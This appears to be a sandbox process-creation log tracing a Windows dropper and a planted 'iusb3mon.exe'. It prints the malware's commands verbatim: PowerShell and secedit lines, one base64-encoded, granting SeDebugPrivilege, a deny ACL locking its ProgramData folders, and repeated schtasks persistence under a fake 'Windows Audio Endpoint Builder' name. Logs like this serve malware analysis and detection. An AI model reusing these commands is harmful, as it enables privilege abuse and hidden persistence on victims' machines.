Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\inst.ini
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: unknown	Process created: C:\ProgramData\Program\iusb3mon.exe C:\ProgramData\program\iusb3mon.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
